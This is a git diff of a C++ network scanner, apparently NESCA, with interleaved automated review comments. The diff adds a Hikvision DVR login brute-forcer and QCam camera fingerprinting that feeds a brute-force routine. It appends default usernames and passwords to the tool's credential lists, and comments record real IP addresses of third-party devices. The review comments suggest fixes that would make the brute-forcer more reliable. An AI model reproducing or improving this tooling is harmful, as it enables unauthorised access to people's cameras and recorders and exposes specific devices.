diff --git a/Connector.cpp b/Connector.cpp index f2de3a7..843af48 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -106,10 +106,6 @@ int my_trace(CURL *handle, curl_infotype type, return 0; } -//struct MemoryStruct { -// char *memory; -// size_t size; -//}; size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *userp) { size_t realsize = size * nmemb; @@ -141,16 +137,9 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool digestMode){ buffer->clear(); - //buffer->reserve(100000); int res = 0; CURL *curl = curl_easy_init(); - //struct MemoryStruct chunk; - - //chunk.memory = (char*)malloc(1); /* will be grown as needed by the realloc above */ - //chunk.size = 0; /* no data at this point */ - //std::string buffer2; - if (curl != NULL) { curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); @@ -199,12 +188,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, { curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); res = curl_easy_perform(curl); - - //if (chunk.size > 0){ - // //buffer2 = std::string(chunk.memory); - // buffer->append(chunk.memory, chunk.size); - //} - + if (port != 21 && lpString != NULL) { int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); if (pos != -1) { 
@@ -215,34 +199,30 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, else res = curl_easy_perform(curl); } else res = curl_easy_perform(curl); - - //if (chunk.size > 0){ - // //buffer2 = std::string(chunk.memory); - // buffer->append(chunk.memory, chunk.size); - //} - + int sz = buffer->size(); if (res == CURLE_OK || - (port == 21 && buffer->size() > 0)) { + (port == 21 && sz > 0)) { if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - Activity += buffer->size(); + Activity += sz; curl_easy_cleanup(curl); - return buffer->size(); + return sz; } else { - curl_easy_cleanup(curl); if (res == 6) return -2; + if (res == 56 && port == 8000) return 1; //Hikvision else if (res != 28 && res != 7 && res != 13 && res != 67 && res != 52 && - res != 55 && res != 56 && + res != 55 && res != 35 && res != 19 && - res != 23) { + res != 23) + { if (res == 5) { stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. "); return -2; 
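Review bot: Removing `curl_easy_cleanup(curl);` from the `else` branch leaves every error return in `nConnect` without releasing the easy handle: `return -2`, the new `return 1`, and the returns in the following hunk. Only the success branch still calls it in the visible lines. Release the handle once, directly after the last `curl_easy_perform` and before `int sz = buffer->size();`, so that no return path can skip it. The new test would also read better with the named constant than with the bare number: `if (res == CURLE_RECV_ERROR && port == 8000) return 1;`. `nConnect` starts and ends outside this hunk.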
@@ -260,202 +240,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, } else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip) + ":" + QString::number(port)); + } else return sz; + + if (res == 23 && sz > 0) { + return sz; } - - if(res == 23 && buffer->size() > 0) { - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]")); - return buffer->size(); - } else return -1; + else return -1; } if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - return buffer->size(); + return sz; } else { stt->doEmitionRedFoundData("Curl error."); return -1; }; } -// -//int Connector::nConnect2(const char* ip, const int port, std::string *buffer, -// const char *postData, -// const std::vector *customHeaders, -// const std::string *lpString, -// bool digestMode) -//{ -// buffer->clear(); -// -// int still_running; -// struct timeval timeout; -// int res = 0; -// CURL *curl = curl_easy_init(); -// -// if (curl != NULL) -// { -// curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); -// if (MapWidgetOpened) { -// struct data config; -// config.trace_ascii = 1; /* enable ascii tracing */ -// curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); -// curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); -// curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); -// } -// curl_easy_setopt(curl, CURLOPT_URL, ip); -// curl_easy_setopt(curl, CURLOPT_PORT, port); -// curl_easy_setopt(curl, CURLOPT_USERAGENT, -// "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); -// curl_easy_setopt(curl, CURLOPT_HEADER, 1L); -// curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); -// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); -// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); -// curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); -// curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); -// int proxyPort = std::atoi(gProxyPort); -// if (strlen(gProxyIP) != 0 && 
(proxyPort > 0 && proxyPort < 65535)) { -// curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); -// curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); -// } -// else { -// curl_easy_setopt(curl, CURLOPT_PROXY, ""); -// } -// curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); -// curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); -// curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); -// -// if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); -// -// if (customHeaders != NULL) { -// struct curl_slist *chunk = NULL; -// for (auto &ch : *customHeaders) chunk = curl_slist_append(chunk, ch.c_str()); -// curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk); -// } -// -// if (lpString != NULL) { -// curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); -// curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); -// curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); -// if (digestMode) curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); -// } -// -// -// CURLM *multi_handle = curl_multi_init(); -// if (multi_handle == NULL) stt->doEmitionRedFoundData("curl_multi_init == NULL!"); -// curl_multi_add_handle(multi_handle, curl); -// -// do { res = curl_multi_perform(multi_handle, &still_running); } -// while (res == CURLM_CALL_MULTI_PERFORM); -// -// while (still_running) { -// fd_set fdread; -// fd_set fdwrite; -// fd_set fdexcep; -// int maxfd = -1; -// -// FD_ZERO(&fdread); -// FD_ZERO(&fdwrite); -// FD_ZERO(&fdexcep); -// -// timeout.tv_sec = gTimeOut; -// timeout.tv_usec = 0; -// -// curl_multi_fdset(multi_handle, &fdread, &fdwrite, &fdexcep, &maxfd); -// -//#ifdef _WIN32 -// Sleep(100); -//#else -// struct timeval wait = { 0, 100 * 1000 }; /* 100ms */ -// rc = select(0, NULL, NULL, NULL, &wait); -//#endif -// -// /* get file descriptors from the transfers */ -// switch (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, &timeout)) { -// case -1: -// /* select error */ -// still_running = 0; -// 
stt->doEmitionRedFoundData("select() returns error, this is badness"); -// break; -// case 0: -// default: -// /* timeout or readable/writable sockets */ -// do -// { -// res = curl_multi_perform(multi_handle, &still_running); -// } while (res == CURLM_CALL_MULTI_PERFORM); -// break; -// } -// } -// -// curl_multi_remove_handle(multi_handle, curl); -// curl_multi_cleanup(multi_handle); -// curl_easy_cleanup(curl); -// -// if (res == CURLE_OK || -// (port == 21 && buffer->size() > 0)) { -// -// if (digestMode) -// { -// if (port != 21 && lpString != NULL) { -// int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); -// if (pos != -1) { -// *buffer = buffer->substr(pos + 4); -// } -// } -// } -// -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); -// Activity += buffer->size(); -// return buffer->size(); -// } -// else { -// if (res == 6) return -2; -// else if (res != 28 && -// res != 7 && -// res != 67 && -// res != 52 && -// res != 55 && -// res != 56 && -// res != 35 && -// res != 19 && -// res != 23) { -// if (res == 5) { -// stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. "); -// return -2; -// } -// else if (res == 13) { -// stt->doEmitionFoundData("Unknown ftp. (" + QString::number(res) + ") " + -// QString(ip) + ":" + QString::number(port)); -// return -2; -// } -// else if (res == 8) { -// stt->doEmitionFoundData("Strange ftp reply. (" + -// QString::number(res) + ") " + QString(ip) + -// ":" + QString::number(port)); -// return -2; -// } -// else if (res == 18) { -// stt->doEmitionFoundData("Inappropriate file size. 
(" + -// QString::number(res) + ") " + QString(ip) + -// ":" + QString::number(port)); -// return -2; -// } -// else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + -// QString(ip) + ":" + QString::number(port)); -// } -// -// if (res == 23 && buffer->size() > 0) { -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]")); -// return buffer->size(); -// } -// else return -1; -// } -// -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); -// return buffer->size(); -// } -// else { -// stt->doEmitionRedFoundData("Curl error."); -// return -1; -// }; -//} int Connector::connectToPort(char* ip, int port) { @@ -467,7 +266,7 @@ int Connector::connectToPort(char* ip, int port) std::string buffer; int size = 0; - if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); + if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH else size = nConnect(ip, port, &buffer); if(size > 0) diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp new file mode 100644 index 0000000..f43b56a --- /dev/null +++ b/HikvisionLogin.cpp 
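Review bot: The added `} else return sz;` makes the `if (res == 23 && sz > 0)` test below it dead code. 23 is one of the codes excluded by the `res != 23` condition in the previous hunk, so it now leaves through `else return sz;`, and everything that reaches the later test returns -1. The same `else` changes the result for the other excluded codes (28, 7, 52, ...) from -1 to `sz`, which can be 0, so callers have to treat 0 as a failure; `connectToPort` does with `if(size > 0)`, while other callers are not visible here. If that is intended, replace the trailing block with a plain `return -1;` and add a comment such as `// transfer errors with partial data: hand back what was received`.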
@@ -0,0 +1,62 @@
+#include "HikvisionLogin.h"
+#include "externData.h"
+#include "FileUpdater.h"
+
+bool HikVis::isInitialized = false;
+
+void HikVis::hikInit(){
+ //hik_init_ptr();
+}
+
+void HikVis::hikCleanup(){
+ //hik_cleanup_ptr();
+}
+
+lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
+{
+ lopaStr lps = { "UNKNOWN", "", "" };
+ int passCounter = 0;
+
+ for (int i = 0; i < MaxLogin; ++i) {
+ for (int j = 0; j < MaxPass; ++j) {
+ FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
+ if (!globalScanFlag) return lps;
+
+ NET_DVR_DEVICEINFO_V30 *info;
+ hik_init_ptr();
+ if (hik_login_ptr(sDVRIP, wDVRPort, loginLst[i], passLst[j], info) == 0) {
+ strcpy(lps.login, loginLst[i]);
+ strcpy(lps.pass, passLst[j]);
+ hik_cleanup_ptr();
+ return lps;
+ }
+ hik_cleanup_ptr();
+
+ if (BALogSwitched) stt->doEmitionBAData("HV: " + QString(sDVRIP) + ":" + QString::number(wDVRPort) +
+ "; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" +
+ QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
+
+ Sleep(100);
+ }
+ }
+
+ return lps;
+}
+
+lopaStr HikVis::HVLobby(const char *ip, const int port) {
+ if (gMaxBrutingThreads > 0) {
+
+ while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
+
+ ++baCount;
+ ++BrutingThrds;
+ const lopaStr &lps = hikLogin(ip, port);
+ --BrutingThrds;
+
+ return lps;
+ }
+ else {
+ lopaStr lps = { "UNKNOWN", "", "" };
+ return lps;
+ }
+}
\ No newline at end of file
diff --git a/HikvisionLogin.h b/HikvisionLogin.h
new file mode 100644
index 0000000..e52397e
--- /dev/null
+++ b/HikvisionLogin.h
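Review bot: `NET_DVR_DEVICEINFO_V30 *info;` in `hikLogin` is an uninitialised pointer that is handed to `hik_login_ptr` as the device-info argument, so anything the library writes through it lands at an indeterminate address. Give the callee real storage instead, `NET_DVR_DEVICEINFO_V30 info = {};`, and pass `&info`. The two `strcpy` calls into `lps.login` and `lps.pass` are unbounded as well; the field sizes of `lopaStr` are not visible in this diff, so the copies need a length check or a bounded copy with explicit termination.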
@@ -0,0 +1,25 @@ +#ifndef HIKVISIONLOGIN_H +#define HIKVISIONLOGIN_H + +#include "STh.h" +#include "mainResources.h" + +class HikVis { +public: static bool isInitialized; + +private: lopaStr hikLogin(const char * sDVRIP, int wDVRPort); + +public: + HikVis(){ + hikInit(); + } + ~HikVis(){ + hikCleanup(); + } + + void hikInit(); + void hikCleanup(); + lopaStr HVLobby(const char *ip, const int port); +}; + +#endif // UTILS_H \ No newline at end of file diff --git a/externFunctions.h b/externFunctions.h index 15bc901..ab6e96e 100644 --- a/externFunctions.h +++ b/externFunctions.h @@ -1,6 +1,8 @@ #ifndef EF_H #define EF_H +#include + extern std::string toLowerStr(const char *str); extern char* strstri(const char *_Str, const char *_SubStr); diff --git a/finder.cpp b/finder.cpp index c1df1f9..73efbaf 100644 --- a/finder.cpp +++ b/finder.cpp @@ -11,6 +11,7 @@ #include "FileUpdater.h" #include "IPCAuth.h" #include +#include "HikvisionLogin.h" unsigned char tl(unsigned char d) { @@ -395,6 +396,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1 ) return 54; //Beward (http://46.146.243.88:88/login.asp) + if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1 + && Utils::ustrstr(buffcpy, "str_device+") != -1) return 55; //QCam (http://1.177.123.118:8080/) + if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) || (Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) || (Utils::ustrstr(buffcpy, "220 ftp server ready") != -1) 
@@ -2334,7 +2338,18 @@ int Lexems::header(char *ip, int port, const char *str, Lexems *l, PathStr *ps, int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx) { - if (port == 22) + if (HikVis::isInitialized && port == 8000) { + HikVis hv; + lopaStr lps = hv.HVLobby(ip, port); + if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerBA(ip, port, "[Hikvision] iVMS client required.", lps.login, lps.pass, 0); + fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision] iVMS client required ().", + lps.login, lps.pass, "[Hikvision] iVMS", "UTF-8", "Basic Authorization"); + return -1; + }; + } + else if (port == 22) { _saveSSH(ip, 22, size, buffcpy->c_str()); return -1; @@ -2603,6 +2618,10 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex { _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD"); } + else if (flag == 55) //QCam + { + _specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size); + } else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { diff --git a/login.txt b/login.txt index c3ae602..deaf188 100644 --- a/login.txt +++ b/login.txt @@ -2,6 +2,7 @@ admin root 123123 123456 +support 12345 cisco @@ -30,4 +31,5 @@ cgadmin 888888 777777 555555 -111222333 \ No newline at end of file +111222333 +ubnt \ No newline at end of file diff --git a/mainResources.h b/mainResources.h index c9d4405..85f1972 100644 --- a/mainResources.h +++ b/mainResources.h @@ -1,4 +1,4 @@ -#pragma once +#pragma once #include "base64.h" #include 
@@ -90,6 +90,28 @@ typedef int BOOL; #define MAX_ADDR_LEN 128 #endif +struct NET_DVR_DEVICEINFO_V30 +{ + unsigned char sSerialNumber; //序列号 + unsigned char byAlarmInPortNum; //报警输入个数 + unsigned char byAlarmOutPortNum; //报警输出个数 + unsigned char byDiskNum; //硬盘个数 + unsigned char byDVRType; //设备类型, 1:DVR 2:ATM DVR 3:DVS ...... + unsigned char byChanNum; //模拟通道个数 + unsigned char byStartChan; //起始通道号,例如DVS-1,DVR - 1 + unsigned char byAudioChanNum; //语音通道数 + unsigned char byIPChanNum; //最大数字通道个数 + unsigned char byZeroChanNum; //零通道编码个数 //2010-01-16 + unsigned char byMainProto; //主码流传输协议类型 0-private, 1-rtsp + unsigned char bySubProto; //子码流传输协议类型0-private, 1-rtsp + unsigned char bySupport; //能力,位与结果为0表示不支持,1表示支持, + unsigned char bySupport1; // 能力集扩充,位与结果为0表示不支持,1表示支持 + unsigned char byRes1; + int wDevType; //设备型号 + + unsigned char byRes2; //保留 +}; + struct PathStr{ char codepage[32]; char headr[TITLE_MAX_SIZE]; @@ -136,3 +158,17 @@ public: int size, Lexems *lx); }; + +//Hikvision SDK extern functions +//typedef int(__stdcall *f_func)(); +typedef void(__stdcall *NET_DVR_Init)(); +typedef void(__stdcall *NET_DVR_Cleanup)(); +typedef int(__stdcall *NET_DVR_Login_V30)(const char * sDVRIP, + int wDVRPort, + const char * sUserName, + const char * sPassword, + NET_DVR_DEVICEINFO_V30 *lpDeviceInfo); + +extern NET_DVR_Init hik_init_ptr; +extern NET_DVR_Cleanup hik_cleanup_ptr; +extern NET_DVR_Login_V30 hik_login_ptr; \ No newline at end of file diff --git a/negatives.txt b/negatives.txt index 6158b1b..a468da0 100644 --- a/negatives.txt +++ b/negatives.txt @@ -1,3 +1,6 @@ +Analog Telephone Adapter +IP Dect - +AnyGate Unable to open WebDAV Ruckus Wireless diff --git a/nesca_3.cpp b/nesca_3.cpp index 8b7d665..bb74c19 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp 
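Review bot: This hand-written `NET_DVR_DEVICEINFO_V30` has to match the layout the DLL expects byte for byte, and several fields suggest it does not. `sSerialNumber` (commented as the serial number) and the reserved `byRes2` are single `unsigned char`s, and `wDevType` is an `int` although its prefix suggests a 16-bit field. If the library fills a structure larger than `sizeof` this one, the write runs past the caller's object. Take the definition from the vendor's SDK header rather than re-declaring it, or at least pin the expected size with a `static_assert(sizeof(NET_DVR_DEVICEINFO_V30) == /* size from the SDK documentation */, "layout mismatch");`. The field comments would be easier to maintain in English.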
@@ -16,6 +16,11 @@ #include #include "progressbardrawer.h" #include "FileDownloader.h" +#include "HikvisionLogin.h" + +NET_DVR_Init hik_init_ptr = NULL; +NET_DVR_Cleanup hik_cleanup_ptr = NULL; +NET_DVR_Login_V30 hik_login_ptr = NULL; QDate date = QDate::currentDate(); int ver = 100*(100*(date.year()%100) + date.month()) + date.day(); @@ -2929,6 +2934,41 @@ QString GetColorCode(int mode, QString str) return result; } +void enableHikvisionSupport(){ + HINSTANCE hGetProcIDDLL = LoadLibrary(L".\\HCNetSDK.dll"); + + if (!hGetProcIDDLL) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not load HCNetSDK.dll! Hikvision support disabled."); + return; + } + + hik_init_ptr = (NET_DVR_Init)GetProcAddress(hGetProcIDDLL, "NET_DVR_Init"); + if (!hik_init_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikInit()! Hikvision support disabled."); + return; + } + + hik_login_ptr = (NET_DVR_Login_V30)GetProcAddress(hGetProcIDDLL, "NET_DVR_Login_V30"); + if (!hik_login_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikLogin()! Hikvision support disabled."); + return; + } + + hik_cleanup_ptr = (NET_DVR_Cleanup)GetProcAddress(hGetProcIDDLL, "NET_DVR_Cleanup"); + if (!hik_cleanup_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikCleanup()! Hikvision support disabled."); + return; + } + + HikVis::isInitialized = true; + stt->doEmitionGreenFoundData("Hikvision support enabled."); +} + + nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) { setWindowFlags(Qt::FramelessWindowHint); @@ -2990,7 +3030,8 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) qApp->quit(); }; #endif - + + std::thread fuThread(FileDownloader::checkWebFiles); fuThread.detach(); 
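Review bot: `LoadLibrary(L".\\HCNetSDK.dll")` in `enableHikvisionSupport` resolves the DLL against the process's current working directory rather than the install directory. Starting the program from a directory another user can write to therefore loads whatever `HCNetSDK.dll` is there. Restrict the search to the application directory, e.g. `LoadLibraryExW(L"HCNetSDK.dll", NULL, LOAD_LIBRARY_SEARCH_APPLICATION_DIR)`, or build an absolute path from the executable's location. Each failure path also leaves the module loaded and the already-resolved pointers non-null, so add `FreeLibrary(hGetProcIDDLL);` and reset the three `hik_*_ptr` globals to `NULL` before returning. The error texts name `hikInit()`, `hikLogin()` and `hikCleanup()`, although the symbol that was not found is the corresponding `NET_DVR_*` export.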
@@ -2998,6 +3039,12 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) _startMsgCheck(); qrp.setMinimal(true); drawVerboseArcs(0); + + //[5.39.163.202] 8000 (? ) open + +#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) + enableHikvisionSupport(); +#endif } nesca_3::~nesca_3() diff --git a/pass.txt b/pass.txt index 8319df2..d129721 100644 --- a/pass.txt +++ b/pass.txt @@ -17,6 +17,7 @@ qwerty meinsm monitor user +support test sysadm admin123 @@ -54,4 +55,5 @@ backup fujiyama super P@ssw0rd -passw0rd \ No newline at end of file +passw0rd +ubnt \ No newline at end of file diff --git a/version b/version index fc7153c..88bf941 100644 --- a/version +++ b/version @@ -1 +1 @@ -24B99-78C \ No newline at end of file +24B9C-72B \ No newline at end of file
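Review bot: In the added `#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)`, `&&` binds tighter than `||`, so the Cygwin exclusion applies only to `__WIN32`. If it is meant to cover all three macros, parenthesise: `#if (defined(WIN32) || defined(_WIN32) || defined(__WIN32)) && !defined(__CYGWIN__)`. `enableHikvisionSupport` itself is defined in the earlier nesca_3.cpp hunk with no platform guard visible, although it uses `LoadLibrary` and `GetProcAddress`; unless it is guarded outside that hunk, non-Windows builds will not compile. The comment added above the `#if` records what looks like a third-party host address and is better left out of the source. The constructor starts outside this hunk.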